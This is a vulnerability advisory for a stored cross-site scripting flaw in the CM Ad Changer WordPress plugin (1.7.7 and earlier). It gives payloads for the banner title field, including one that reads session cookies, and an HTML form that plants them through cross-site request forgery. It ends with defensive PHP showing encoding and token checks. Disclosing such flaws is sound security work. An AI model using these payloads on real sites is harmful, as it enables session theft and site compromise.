CM Ad Changer <= 1.7.7 - Stored Cross-Site Scripting (XSS)


Description
A stored cross-site scripting (XSS) vulnerability was reported by the author to CM Ad Plugins. An unprivileged user can trigger the stored XSS to perform malicious actions, or any attacker could send a crafted link (CSRF) that triggers the stored XSS.

Proof of Concept
1) Go to CM Ad Changer -> Campaigns

2) Create a campaign. Enter whatever you want in the campaign settings. In the next tab, "Campaign Banners", select an image in Campaign images and enter this payload in Banner Title:
</script><script>confirm(/aaditya/)</script>
</script><script>confirm(document.cookie)</script>

3) Click Save. The payload triggers every time you return.

An attacker can make a payload file containing the following:

<html>
 
  <body>
    <h1> Click The button below. POC By Aaditya Purani:: CM AD Changer 1.7.7 </h1>   
    <form action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=cmac_campaigns&action=edit&campaign_id={TARGET_ID}" method="POST">
      <input type="hidden" name="campaign_id" value="1" />
      <input type="hidden" name="title" value="Hacked by Aaditya" />
      <input type="hidden" name="comment" value="" />
      <input type="hidden" name="link" value="" />
      <input type="hidden" name="status" value="on" />
      <input type="hidden" name="banner_display_method" value="selected" />
      <input type="hidden" name="banner_filename[]" value="yourpicvalue.jpg" />
      <input type="hidden" name="banner_title[]" value="</script><script>confirm(/aaditya/)</script>" />
      <input type="hidden" name="banner_title_tag[]" value="" />
      <input type="hidden" name="banner_tag[]" value="" />
      <input type="hidden" name="banner_link[]" value="" />
      <input type="hidden" name="banner_weight[]" value="0" />
      <input type="hidden" name="selected_banner" value="yourpicvalue.jpg" />
      <input type="hidden" name="submit" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

This will trigger the stored XSS in the banner_title parameter.
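The two controls that stop this chain, context-aware output encoding of banner_title and a CSRF token on the save request, are sketched below as an added example; it is not code from the plugin or from its 1.7.8 fix. The function names, the action string and the HMAC token scheme are hypothetical stand-ins (in WordPress the corresponding helpers are esc_html(), esc_attr(), wp_json_encode(), wp_nonce_field() and check_admin_referer()), and it assumes the title can reach both HTML and inline-script output, which the page does not state.

```php
<?php
// Added example, not the plugin's code. All function names are hypothetical.

// Constructed sample input: the banner title payload from the proof of concept.
$banner_title = '</script><script>confirm(/aaditya/)</script>';

// HTML body or attribute context: encode markup characters.
// WordPress equivalents: esc_html() and esc_attr().
function title_for_html(string $title): string {
    return htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Inline <script> context: emit a JSON string literal with <, >, &, ' and "
// written as \uXXXX escapes, so the HTML parser never sees "</script>".
// WordPress equivalent: wp_json_encode() with the same JSON_HEX_* flags.
function title_for_script(string $title): string {
    return json_encode(
        $title,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// CSRF: a per-session, per-action token checked before the campaign is saved.
// The HMAC scheme here is a simplified stand-in for WordPress nonces.
function make_token(string $session_secret, string $action): string {
    return hash_hmac('sha256', $action, $session_secret);
}

function token_is_valid(string $session_secret, string $action, string $sent): bool {
    // hash_equals() compares in constant time.
    return hash_equals(make_token($session_secret, $action), $sent);
}

$secret = bin2hex(random_bytes(16));   // constructed per-session secret
$action = 'edit-campaign_1';           // hypothetical action name
$good   = make_token($secret, $action);

echo "HTML context:   ", title_for_html($banner_title), "\n";
echo "Script context: var title = ", title_for_script($banner_title), ";\n";
echo "Form with token accepted:    ",
     var_export(token_is_valid($secret, $action, $good), true), "\n";
// The cross-site form in the proof of concept carries no token field.
echo "Form without token accepted: ",
     var_export(token_is_valid($secret, $action, ''), true), "\n";
```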

Affects

Plugin cm-ad-changer
fixed in version 1.7.8

References

URL https://ad-changer.cminds.com/cm-ad-changer-plugin-free-edition-release-notes/

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Aaditya Purani
Submitter Website https://aadityapurani.com
Submitter Twitter aaditya_purani
Verified No
WPVDB ID 8514

Timeline

Publicly Published 2016-06-09
Added 2016-06-13
Last Updated 2016-06-13

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.